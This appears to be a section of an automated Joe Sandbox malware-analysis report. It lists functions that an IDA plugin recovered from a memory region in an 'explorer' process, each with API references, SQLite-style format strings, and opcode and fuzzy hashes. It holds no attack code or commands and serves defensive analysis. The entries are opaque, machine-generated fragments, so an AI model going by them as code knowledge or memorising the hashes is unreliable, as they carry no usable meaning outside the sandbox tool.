                                                                                                                                                                                • Instruction ID: 95a741b9244fd8917c608e37cefadf8d532f1c1bca8e7908cd4467c075183b6f
                                                                                                                                                                                • Opcode Fuzzy Hash: e43615a15ceb2ab8a8dc3c6c51e537c0b4a0f9f018647123313b87ef4abcf15e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9751E062315B8082CE14EF26F66036D67A2F74AFC4F445A2ADF5A5BB18DF38C852C344
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                • API String ID: 1488884202-2815843928
                                                                                                                                                                                • Opcode ID: f592f0726937901e75c50cae9b07656f842d0ac3f8180f27825d474dfa541f46
                                                                                                                                                                                • Instruction ID: 2a3801a9faeda5059b5f924d8e12700246b807785e6401b4190bcc66c751f85c
                                                                                                                                                                                • Opcode Fuzzy Hash: f592f0726937901e75c50cae9b07656f842d0ac3f8180f27825d474dfa541f46
                                                                                                                                                                                • Instruction Fuzzy Hash: D551BF3A701B8086DB54DF32F4A036D33A4FB55BA4F584A2ADE6A577A4DF38C859C340
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6AC92D
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6ACB09
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: $*
                                                                                                                                                                                • API String ID: 3215553584-3982473090
                                                                                                                                                                                • Opcode ID: 8ff6d2332c836db3dd7d7b499d21f4ac2483bfcf503b27e520416d3786cec2b4
                                                                                                                                                                                • Instruction ID: 591b833665bf3445e83d5fe8b7fcf830b1aec0daa4c297679714a5c8cab1ed4e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ff6d2332c836db3dd7d7b499d21f4ac2483bfcf503b27e520416d3786cec2b4
                                                                                                                                                                                • Instruction Fuzzy Hash: D6519E7291A2548AC729CF39A1A417CBBA5F347F58B5C221ADB8652318CB35CC82CF54
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6AC719
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6AC8F6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: $*
                                                                                                                                                                                • API String ID: 3215553584-3982473090
                                                                                                                                                                                • Opcode ID: e617ae012fc52c8923c0b946f03791004ecf9f13b485bde04b431a1ab6a96d68
                                                                                                                                                                                • Instruction ID: da5b3d9e239c4b7e07f9235c9d28540e311a2814c0989d0921b8db3b832fb630
                                                                                                                                                                                • Opcode Fuzzy Hash: e617ae012fc52c8923c0b946f03791004ecf9f13b485bde04b431a1ab6a96d68
                                                                                                                                                                                • Instruction Fuzzy Hash: 47518F72D196408ADB298F39A06837CBFA0F746B68F5E121ACB4252359CB35CC86CF45
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6ACB3B
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6ACD0D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: $*
                                                                                                                                                                                • API String ID: 3215553584-3982473090
                                                                                                                                                                                • Opcode ID: c5369b1d1acde520051f7355c8406200c4ede355eee6778c6ecab0fc6fe7ce6b
                                                                                                                                                                                • Instruction ID: 2f13883b9afa12c5022097dd04befc26a065352941c7ecb1f0e53cebdb18e9ac
                                                                                                                                                                                • Opcode Fuzzy Hash: c5369b1d1acde520051f7355c8406200c4ede355eee6778c6ecab0fc6fe7ce6b
                                                                                                                                                                                • Instruction Fuzzy Hash: 08515973919650CADB288F39E0A836CBBA1F346B59F5C222ACB4746358C735CC82CF05
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: cannot detach database %s$database %s is locked$no such database: %s
                                                                                                                                                                                • API String ID: 1488884202-1259387423
                                                                                                                                                                                • Opcode ID: a9e96a8b537128cfa5f8a0395251e7e5db4ee858e17355762b8284d90bfafd50
                                                                                                                                                                                • Instruction ID: fcee35ba52f3f8bc6858c5423e9dd4a716ae5884a2b1bb83a6e5f94bec156839
                                                                                                                                                                                • Opcode Fuzzy Hash: a9e96a8b537128cfa5f8a0395251e7e5db4ee858e17355762b8284d90bfafd50
                                                                                                                                                                                • Instruction Fuzzy Hash: 00318976225A8086DB24CF16F494B5D3BB1F388BE4F85462AEE5E5B344DF39D886C340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AllocProcesswcsftime
                                                                                                                                                                                • String ID: %d-%b-%Y %H:%M
                                                                                                                                                                                • API String ID: 4132867137-526061514
                                                                                                                                                                                • Opcode ID: af14f3205ef66b0517bc7e942630facd99bca4a0fc37d622f912a1caaf039054
                                                                                                                                                                                • Instruction ID: 23e9bc9b866f62f13850c7d425585acf300cf482625f54e03ba5acb18044b065
                                                                                                                                                                                • Opcode Fuzzy Hash: af14f3205ef66b0517bc7e942630facd99bca4a0fc37d622f912a1caaf039054
                                                                                                                                                                                • Instruction Fuzzy Hash: FDF0C26071274A82DE159B25F8183D963D1AB88BC0F88443ACE8D1B754EE3CEA85CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AllocProcesssnprintf
                                                                                                                                                                                • String ID: %llu
                                                                                                                                                                                • API String ID: 2768945650-507646796
                                                                                                                                                                                • Opcode ID: fbe74492de0c58a96a336b2e78cdf3659ce7a75c0a75655281d28f762d5d2768
                                                                                                                                                                                • Instruction ID: ac1eea1c094b0fc03a9aaac9f3b01ca3db5f5369fdcb6dfdda474fb4421138d8
                                                                                                                                                                                • Opcode Fuzzy Hash: fbe74492de0c58a96a336b2e78cdf3659ce7a75c0a75655281d28f762d5d2768
                                                                                                                                                                                • Instruction Fuzzy Hash: C6F0E96171268553DF189B16FC183AC6391A789BD0F589539CD191BB98DD3DD8858700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: %s.%s$%s.rowid
                                                                                                                                                                                • API String ID: 2941638530-1163076669
                                                                                                                                                                                • Opcode ID: 35d8670aebddcdc71436ee248236c59afeaaae9ad3be141e758003d3ad373560
                                                                                                                                                                                • Instruction ID: b3ee0317f7e58df76938881c162d953c008591ea31ca12508355ffe521b4d6ce
                                                                                                                                                                                • Opcode Fuzzy Hash: 35d8670aebddcdc71436ee248236c59afeaaae9ad3be141e758003d3ad373560
                                                                                                                                                                                • Instruction Fuzzy Hash: 39F0C222318A84C1DB20AF66F84039C6B61E3C6BD8F58452BDA5C2B364CB79C949C701
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0E623FFD
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0E62400A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                • Opcode ID: 91f2818d95ab1f9aff1d62c32d5b15ab22eedf3d2ae2378a857255074f6e612a
                                                                                                                                                                                • Instruction ID: dd4c2fead785b0925ea5631cebec91782ebcdda4d4d040aa65657794ad9f83dc
                                                                                                                                                                                • Opcode Fuzzy Hash: 91f2818d95ab1f9aff1d62c32d5b15ab22eedf3d2ae2378a857255074f6e612a
                                                                                                                                                                                • Instruction Fuzzy Hash: 64E06560B10B5889E608EF42FC8439837A1B7A4F80F994828CB1D43B20CB39CDA0CB44
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CA6
                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CAC
                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CB2
                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CB8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3668304517-0
                                                                                                                                                                                • Opcode ID: 8e43e90ad0944aaeca86e0ab888ea8ccf6e7122b7d4f9ab18fce5a6bba972209
                                                                                                                                                                                • Instruction ID: 25c680254e0445d05c12c2258f7a4b16e1a4e577f9cb9ae23e1c93afde1c7e76
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e43e90ad0944aaeca86e0ab888ea8ccf6e7122b7d4f9ab18fce5a6bba972209
                                                                                                                                                                                • Instruction Fuzzy Hash: D941E221355EA682EF188A26FA4431C6362E709FD4F548D39CF5A0BB4CDB6CCC928B45
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 659108358-0
                                                                                                                                                                                • Opcode ID: 1a5cbe290e6164308e760f08b1077ff65b42fb5fec338d9a0b660c1ab1545f37
                                                                                                                                                                                • Instruction ID: 8530598455e392b530a005521fba16a339a5b75460cced2aa5b1b17947fee60b
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a5cbe290e6164308e760f08b1077ff65b42fb5fec338d9a0b660c1ab1545f37
                                                                                                                                                                                • Instruction Fuzzy Hash: B1115632204B9197D704CB2AF84435D3370F748B84F54443ADB4A97B24EF36E9A6CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1447195878-0
                                                                                                                                                                                • Opcode ID: 30da044a8b31290615ad2a970db6bb58edfe8bdf98a4171a9d1c89323dabce22
                                                                                                                                                                                • Instruction ID: 35b11e90f3f67a57a13ef74f474917ff7504b9e3ac8ce03f7b75c1e451496170
                                                                                                                                                                                • Opcode Fuzzy Hash: 30da044a8b31290615ad2a970db6bb58edfe8bdf98a4171a9d1c89323dabce22
                                                                                                                                                                                • Instruction Fuzzy Hash: 44014B2430174046EB1D6B31B9683ED63939F95BD5F14092CD92B57B95FE29ECC68300
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6B6A68
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                • API String ID: 3215553584-1523873471
                                                                                                                                                                                • Opcode ID: 520b82a36c0a7b9d249dd85874503ff5ac1e0feac7974ac1f6c09453a383f967
                                                                                                                                                                                • Instruction ID: 8d8edc9354f80b0fcbee5885290c01732bc93d6af07902648e31ceb03dc28145
                                                                                                                                                                                • Opcode Fuzzy Hash: 520b82a36c0a7b9d249dd85874503ff5ac1e0feac7974ac1f6c09453a383f967
                                                                                                                                                                                • Instruction Fuzzy Hash: 548145637163C986DB158F2AF1803ECBB65E766BD0F089121CF9907765EB38C996C301
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6ACD4A
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6ACF84
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: *
                                                                                                                                                                                • API String ID: 3215553584-163128923
                                                                                                                                                                                • Opcode ID: fad42e489f23c5c2b1f1f78ebfa2d8998639f6a6390f6c80db9e78c1b0a84f1f
                                                                                                                                                                                • Instruction ID: 185a61887b7f00eef2d8d0a09b8c8f3806fee296d5fdc204d0c9a0ad38187359
                                                                                                                                                                                • Opcode Fuzzy Hash: fad42e489f23c5c2b1f1f78ebfa2d8998639f6a6390f6c80db9e78c1b0a84f1f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4961D372A15660C6CB289F39E06427CBBB4F70AF48B5C221ADB0657358DB35CD82CF54
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6B6E77
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                • API String ID: 3215553584-3030954782
                                                                                                                                                                                • Opcode ID: 476d8f94a21602e2858b7bffa39b26425147de9b952212b80d91de2b1b8549c3
                                                                                                                                                                                • Instruction ID: e615731634a5cc3a3beca317bb8144d23bc94e0593f9a2e6ce0bafcb062a314e
                                                                                                                                                                                • Opcode Fuzzy Hash: 476d8f94a21602e2858b7bffa39b26425147de9b952212b80d91de2b1b8549c3
                                                                                                                                                                                • Instruction Fuzzy Hash: EB4119627257C086D7258F39F85039D7B96E381B90F4CD625CBA88BBD9DB2CC885C700
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0E623B77
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0E623B84
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                • API String ID: 909987262-2556327735
                                                                                                                                                                                • Opcode ID: 638eed04e472bf6492dba83b0df2ea54084f24fa6f2fad4fd946a58b80a7aad9
                                                                                                                                                                                • Instruction ID: 234ea9991d1f29a97ec81ca5ed81940aa47c760721ca82dd81596497786a2320
                                                                                                                                                                                • Opcode Fuzzy Hash: 638eed04e472bf6492dba83b0df2ea54084f24fa6f2fad4fd946a58b80a7aad9
                                                                                                                                                                                • Instruction Fuzzy Hash: D831C462795EA685EF048F1AF5502186321E355FD0F884A39CE6E07BD8DB7DCC928B01
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: OsError 0x%lx (%lu)
                                                                                                                                                                                • API String ID: 1488884202-3720535092
                                                                                                                                                                                • Opcode ID: 2796b976d12cad71f742763eb2529de1659e39ba970a831c9b33c43750192292
                                                                                                                                                                                • Instruction ID: 2931a88ed1e11d881eeaba014b7c4222798c6cc98f3c42616585bed269057d75
                                                                                                                                                                                • Opcode Fuzzy Hash: 2796b976d12cad71f742763eb2529de1659e39ba970a831c9b33c43750192292
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D316532715E9086DB619F26F85075AA3B0FBD9B90F48493DDE4DA7B64DF39C8408B40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: $%!.15g
                                                                                                                                                                                • API String ID: 2941638530-415585126
                                                                                                                                                                                • Opcode ID: eb33cb9144ee3cd1f4389dbaa626097b5f312b47766288748575db7650bf8f13
                                                                                                                                                                                • Instruction ID: d7b86f8210defd1ebb37455066cb18dc83e70e85b73d291a8efec075077c5e82
                                                                                                                                                                                • Opcode Fuzzy Hash: eb33cb9144ee3cd1f4389dbaa626097b5f312b47766288748575db7650bf8f13
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C31E5B3118B80C6D7109F25F08432E77A0F752BA8F188615EB994B7D8D779C856CB10
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                • API String ID: 0-4289949731
                                                                                                                                                                                • Opcode ID: 0fa423f91813095ada57ca02907b76f1699c6168422c04900660209f28485fb6
                                                                                                                                                                                • Instruction ID: 15fb197560971c876af32003683349d7be3f0be801e3fbb2a66c998d1458d904
                                                                                                                                                                                • Opcode Fuzzy Hash: 0fa423f91813095ada57ca02907b76f1699c6168422c04900660209f28485fb6
                                                                                                                                                                                • Instruction Fuzzy Hash: CE21F961395EA181EF148A26FE503185312E745FE4B544E3DCE3A07BDCDB2CCC924B41
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: DELETE FROM %Q.%s WHERE %s=%Q$sqlite_stat%d
                                                                                                                                                                                • API String ID: 1488884202-3667113883
                                                                                                                                                                                • Opcode ID: 6aa6f05ab88662c2bf4a7d8f77f366e5caf1c0e8dcbb76c59455029a57eda4b0
                                                                                                                                                                                • Instruction ID: 59d8faa6326cad138537d6befa986a4feddf356c78ee054cdc52e21ae9b3c68c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6aa6f05ab88662c2bf4a7d8f77f366e5caf1c0e8dcbb76c59455029a57eda4b0
                                                                                                                                                                                • Instruction Fuzzy Hash: 81018776324B9482EB108F0AF4806897BA0F388FC8F49512AEF8C67B18CF39D511CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0E623EEE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                • Opcode ID: 11ce337d544bd20418dd297afb6215f919e55a361865993419869e8f00413ec6
                                                                                                                                                                                • Instruction ID: 7b6b0dfd25e107a9936bd34d18bb491827f56358b3df4d3769a9e82c19088d40
                                                                                                                                                                                • Opcode Fuzzy Hash: 11ce337d544bd20418dd297afb6215f919e55a361865993419869e8f00413ec6
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BE0DF20B14B8880D604DB42FC8430963A2BBB47C0F984C268B6D43F30CB3ACC90CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 0E6A4BBD
                                                                                                                                                                                • _CxxThrowException.LIBVCRUNTIME ref: 0E6A4BCE
                                                                                                                                                                                  • Part of subcall function 0E6A70C4: RtlPcToFileHeader.KERNEL32 ref: 0E6A7141
                                                                                                                                                                                  • Part of subcall function 0E6A70C4: RaiseException.KERNEL32 ref: 0E6A7180
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                • API String ID: 3561508498-410509341
                                                                                                                                                                                • Opcode ID: 0e811aa1f1c87dae97651a08db0a869362024b74a6f64d5c2541639744d72e54
                                                                                                                                                                                • Instruction ID: c29c8da53ef4c2a89991c69af831756213a122de04a07d3964763b82be2873c8
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e811aa1f1c87dae97651a08db0a869362024b74a6f64d5c2541639744d72e54
                                                                                                                                                                                • Instruction Fuzzy Hash: 3BD05223B10AC4D2CE10EB00FC80388A370F3A4348FE84816D28E835B0DF6ADE0ACB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                • Opcode ID: b9f64374009a85716698715628642f07bcf485a8e23b64846cf13733ca946d4d
                                                                                                                                                                                • Instruction ID: b491229d2cf2dc4737ed98a80f1fb8b1e8aba02699f127ba9b368fc7c6f1c158
                                                                                                                                                                                • Opcode Fuzzy Hash: b9f64374009a85716698715628642f07bcf485a8e23b64846cf13733ca946d4d
                                                                                                                                                                                • Instruction Fuzzy Hash: AAE06D25601FC096EF18CBA6F91C329A362BB8DFD4F689524CE5A17B18EE39D4558700